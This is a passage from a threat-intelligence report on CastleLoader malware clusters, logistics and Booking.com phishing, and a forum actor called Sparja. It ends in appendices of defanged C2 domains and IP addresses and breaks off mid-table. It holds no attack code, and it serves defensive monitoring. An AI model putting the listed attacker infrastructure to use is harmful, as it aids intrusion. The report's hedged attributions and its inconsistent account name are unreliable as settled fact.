        <p>When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (<a href="https://pro.urlscan.io/result/0198f318-4860-7256-9c58-74307bfe89d0">1</a>, <a href="https://pro.urlscan.io/result/0198e28c-2350-7217-ad05-ebd6694c5fc2">2</a>). Further pivoting from the domain <em>boiksal[.]com</em> uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in <strong>Appendix G</strong>. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.</p>
        <h4>Cluster 4: Malvertising and Fake Software</h4>
        <p>Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.</p>
        <p>Based on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including <em>wereatwar[.]com</em>. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as <em>37[.]230[.]62[.]235</em> and <em>84[.]200[.]81[.]32</em>. Notably, the domain <em>jshanoi[.]com</em> resolved to these NetSupport-associated IP addresses during the period of activity.</p>
        <p>The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those <a href="https://x.com/g0njxa/status/1980943290896630209/photo/3">observed</a> in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.</p>
        <h3>Possible Connection to Exploit Forum User Sparja</h3>
        <p>Analysis of <a href="https://tria.ge/250520-yvkthsbr2s">historical</a> CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on <em>94[.]159[.]113[.]123</em> and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address <em>94[.]159[.]113[.]32</em> (see <strong>Figure 22</strong>)<em>.</em></p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1694a57896b2a72600c74c531634a7f93ce34875f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_158f591d974d66fb741ee6789a74a8c861cd0c09f.png?width=750&amp;format=png&amp;optimize=medium" width="1258" height="272" />
        </p>
        <p><em><strong>Figure 22:</strong></em> <em>Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)</em></p>
        <p>Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.</p>
        <p>On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see <strong>Figure 23</strong>). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader functionality consistent with CastleLoader’s purpose.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c30437beb16bf10e993ab55c126b207e27dcf839.png?width=750&amp;format=png&amp;optimize=medium" width="767" height="529" />
        </p>
        <p><em><strong>Figure 23:</strong></em> <em>Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)</em></p>
        <p>Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see <strong>Figure 24</strong>). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_19420a3499ba40af372c0899cb96c5e2a7642dac2.png?width=750&amp;format=png&amp;optimize=medium" width="983" height="367" /><em><strong>Figure 24:</strong></em> <em>Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)</em>
        </p>
        <p>A <a href="https://tria.ge/250520-yvkthsbr2s/behavioral1">related</a> CastleLoader sample, distributed as an MSI installer, was <a href="https://bazaar.abuse.ch/sample/8f3fc820def7b492876b38d021c904aafc60c379e8ad58cac81eee05bf41ee77/">identified</a> in Bazaar Abuse data as originating from the GitHub account <em>github[.]com/legend123451111</em>. The same account appears in a Cisco Talos <a href="https://blog.talosintelligence.com/maas-operation-using-emmenhtal-and-amadey-linked-to-threats-against-ukrainian-entities/">report</a> describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.</p>
        <p>The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from <em>github[.]com/legend1234561111</em>, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.</p>
        <p>On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor <a href="https://www.cyberdaily.au/security/11791-black-basta-ransomware-leader-slips-away-from-courtroom">reportedly</a> identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for <a href="https://x.com/PRODAFT/status/1892636346885235092">distributing</a> Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.</p>
        <p>While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.</p>
        <h3>Victimology</h3>
        <p>Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that of the entities Insikt Group identified, the infection might have occurred on individual machines within the network of the victim organization or by using the victim’s WiFi rather than on the organization's network directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix H</strong> to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage Sigma, YARA, and Snort rules provided in <strong>Appendices I</strong>, <strong>J</strong>, <strong>K</strong>, <strong>L</strong>, <strong>M</strong>, <strong>N</strong>, and <strong>O</strong> in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.</li>
          <li>Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.</li>
        </ul>
        <h2>Outlook</h2>
        <p>As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.</p>
        <p>Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.</p>
        <p>Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: CastleLoader C2 Servers</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
          </div>
          <div>
            <div>icantseeyou[.]icu</div>
            <div>80[.]77[.]25[.]239</div>
            <div>2025-10-09</div>
          </div>
          <div>
            <div>anotherproject[.]icu</div>
            <div>45[.]11[.]183[.]165</div>
            <div>2025-10-09</div>
          </div>
          <div>
            <div>donttouchthisisuseless[.]icu</div>
            <div>80[.]77[.]25[.]88</div>
            <div>2025-10-09</div>
          </div>
          <div>
            <div>oldspicenotsogood[.]shop</div>
            <div>45[.]155[.]249[.]121</div>
            <div>2025-09-22</div>
          </div>
          <div>
            <div>doyoureallyseeme[.]icu</div>
            <div>45[.]11[.]183[.]19</div>
            <div>2025-10-31</div>
          </div>
          <div>
            <div>touchmeplease[.]icu</div>
            <div>45[.]11[.]183[.]45</div>
            <div>2025-10-31</div>
          </div>
          <div>
            <div>donttouchme[.]life</div>
            <div>80[.]77[.]25[.]114</div>
            <div>2025-10-31</div>
          </div>
          <div>
            <div>wereatwar[.]com</div>
            <div>172[.]86[.]90[.]58</div>
            <div>2025-11-05</div>
          </div>
          <div>
            <div>rcpeformse[.]com</div>
            <div>147[.]45[.]177[.]127</div>
            <div>2025-11-05</div>
          </div>
          <div>
            <div>roject0[.]com</div>
            <div>185[.]121[.]234[.]141</div>
            <div>2025-11-03</div>
          </div>
          <div>
            <div>bethschwier[.]com</div>
            <div>170[.]130[.]165[.]201</div>
            <div>2025-10-12</div>
          </div>
          <div>
            <div>speatly[.]com</div>
            <div>173[.]44[.]141[.]52</div>
            <div>2025-11-06</div>
          </div>
          <div>
            <div>campanyasoft[.]com</div>
            <div>31[.]58[.]87[.]132</div>
            <div>2025-10-02</div>
          </div>
          <div>
            <div>alafair[.]net</div>
            <div>107[.]158[.]128[.]26</div>
            <div>2025-09-06</div>
          </div>
          <div>
            <div>dpeformse[.]com</div>
            <div>147[.]45[.]177[.]127</div>
            <div>2025-10-29</div>
          </div>
          <div>
            <div>castlppwnd[.]com</div>
            <div>31[.]58[.]50[.]160</div>
            <div>2025-11-05</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix B: Additional Infrastructure Likely Linked to CastleLoader</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
          </div>
          <div>
            <div>albafood[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>albalk[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>bdeskthebest[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>bestproxysale[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>bestvpninfo[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>chessinthenight[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>clgenetics[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>docusign[.]homes</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>dubaialbafood[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>easyadvicesforyou[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>easyprintscreen[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>funjobcollins[.]shop</div>
            <div>31[.]214[.]157[.]77</div>
          </div>
          <div>
            <div>nort-secure[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>norton-secure[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>notstablecoin[.]xyz</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>notusdt[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>nvidblog[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>nvldlainfoblog[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>oldspicenotsogood[.]shop</div>
            <div>45[.]155[.]249[.]121</div>
          </div>
          <div>
            <div>starkforeveryone[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>sweetdevices[.]lol</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>testdomain123123[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradeviewdesktop[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradlngview-desktop[.]biz</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradlngvlewdesktop[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>tradview-desktop[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>vipcinemade[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>vipcinemadubai[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
          <div>
            <div>vipdubaicinema[.]shop</div>
            <div>15[.]197[.]240[.]20</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix C: Logistics-Themed Infrastructure Used by TAG-160</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>loadsschedule[.]com</div>
            <div>199[.]79[.]62[.]141</div>
            <div>2025-08-04</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loadstracking[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-19</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loadstrucking[.]com</div>
            <div>162[.]251[.]80[.]108</div>
            <div>2025-05-18</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>rateconfirmations[.]com</div>
            <div>162[.]215[.]230[.]150</div>
            <div>2025-09-11</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>cdlfreightlogistics[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>dperforms[.]info</div>
            <div>78[.]153[.]155[.]131</div>
            <div>2025-10-01</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>englandloglstics[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>englanglogistlcs[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>loadstracking[.]com</div>
            <div>207[.]174[.]212[.]141</div>
            <div>2025-06-27</div>
            <div>N/A</div>
          </div>
          <div>
            <div>hometownlogisticsllc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>leemanlogisticsinc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>loadplannig[.]com</div>
            <div>204[.]11[.]58[.]80</div>
            <div>2025-07-27</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loads[.]icu</div>
            <div>185[.]236[.]20[.]154</div>
            <div>2025-09-17</div>
            <div>2025-11-10</div>
          </div>
          <div>
            <div>loadsplanning[.]com</div>
            <div>192[.]124[.]178[.]74</div>
            <div>2025-07-26</div>
            <div>2025-07-26</div>
          </div>
          <div>
            <div>loadsschedule[.]com</div>
            <div>199[.]79[.]62[.]141</div>
            <div>2025-08-04</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>loadstracking[.]com</div>
            <div>207[.]174[.]212[.]141</div>
            <div>2025-06-28</div>
            <div>2025-07-03</div>
          </div>
          <div>
            <div>loadstrucking[.]com</div>
            <div>162[.]251[.]80[.]108</div>
            <div>2025-05-18</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>mcentireinc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>mcloads[.]com</div>
            <div>74[.]119[.]239[.]234</div>
            <div>2025-04-18</div>
            <div>2025-05-15</div>
          </div>
          <div>
            <div>mlxfreightinc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>mrlogsol[.]ca</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>pinaccletruckllc[.]com</div>
            <div>74[.]119[.]239[.]234</div>
            <div>2025-04-12</div>
            <div>2025-05-14</div>
          </div>
          <div>
            <div>rateconfirmations[.]com</div>
            <div>162[.]215[.]230[.]150</div>
            <div>2025-09-11</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>redlightninglogistics[.]com</div>
            <div>Cloudflare</div>
            <div>2025-03-21</div>
            <div>2025-11-10</div>
          </div>
          <div>
            <div>redlightninglogisticsinc[.]com</div>
            <div>74[.]119[.]239[.]234</div>
            <div>2025-04-19</div>
            <div>2025-05-13</div>
          </div>
          <div>
            <div>starshiplogisticsgroupllc[.]com</div>
            <div>N/A</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>tenderloads[.]com</div>
            <div>162[.]215[.]241[.]215</div>
            <div>2025-10-24</div>
            <div>2025-11-09</div>
          </div>
          <div>
            <div>162[.]215[.]241[.]46</div>
            <div>2025-09-11</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>trucksscheduling[.]com</div>
            <div>162[.]215[.]230[.]96</div>
            <div>2025-08-18</div>
            <div>2025-11-10</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix D: Booking.com-Themed Domains Linked to TAG-161</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>checkinastayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>checkinistayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-17</div>
          </div>
          <div>
            <div>checkinstayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>checkistayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>checksstayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>checkystayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>confirmahotelastay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>confirmahotelstay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>confirmhotelestay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>confirmhotelistay[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-01</div>
            <div>2025-10-16</div>
          </div>
          <div>
            <div>confirmhotelystay[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>confirmstayon[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-29</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>confirmstayonline[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-29</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>confirmyhotelstay[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaformahub[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaformhub[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaformsafe[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaportalverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestaverifyportal[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guestformahub[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-30</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>guestformasafe[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-30</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guestformhub[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guestformsafe[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-28</div>
            <div>2025-11-03</div>
          </div>
          <div>
            <div>185[.]39[.]19[.]180</div>
            <div>N/A</div>
            <div>N/A</div>
          </div>
          <div>
            <div>guestistayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-02</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guestportalverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>gueststayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestverifyhub[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestverifylink[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-28</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>guestverifyportal[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-30</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guestystayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guesutastayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-01</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guesytastayhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>hoteliguestverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelistayverify[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-31</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelyguestverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-31</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>hotelystayverify[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-31</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>nedpihotel[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-29</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>pilolhotel[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-29</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>roomiverifaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>roomverifaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-03</div>
            <div>2025-10-23</div>
          </div>
          <div>
            <div>roomverifiaccess[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-08-02</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>servicehotelonline[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-08-03</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>verifihubguest[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>verifyhubguest[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-10-22</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
            <div><strong>Notes</strong></div>
          </div>
          <div>
            <div>dok-ol[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-27</div>
            <div>2025-07-28</div>
            <div>N/A</div>
          </div>
          <div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-11-10</div>
          </div>
          <div>
            <div>cik-ed[.]com</div>
            <div>185[.]39[.]19[.]181</div>
            <div>2025-07-28</div>
            <div>2025-11-09</div>
            <div>N/A</div>
          </div>
          <div>
            <div>for-es[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-25</div>
            <div>2025-11-03</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>kil-it[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-06-29</div>
            <div>2025-11-07</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>kip-er[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-11</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>xut-uv[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-20</div>
            <div>2025-11-08</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>eta-cd[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-22</div>
            <div>2025-11-08</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>uki-fa[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-22</div>
            <div>2025-11-07</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>ned-uj[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-07-10</div>
            <div>2025-11-05</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>eto-sa[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-06-25</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>wal-ik[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-10</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>mac-ig[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-20</div>
            <div>2025-11-09</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>map-nv[.]com</div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-07-11</div>
            <div>2025-11-06</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>ipk-sa[.]com</div>
            <div>77[.]83[.]207[.]55</div>
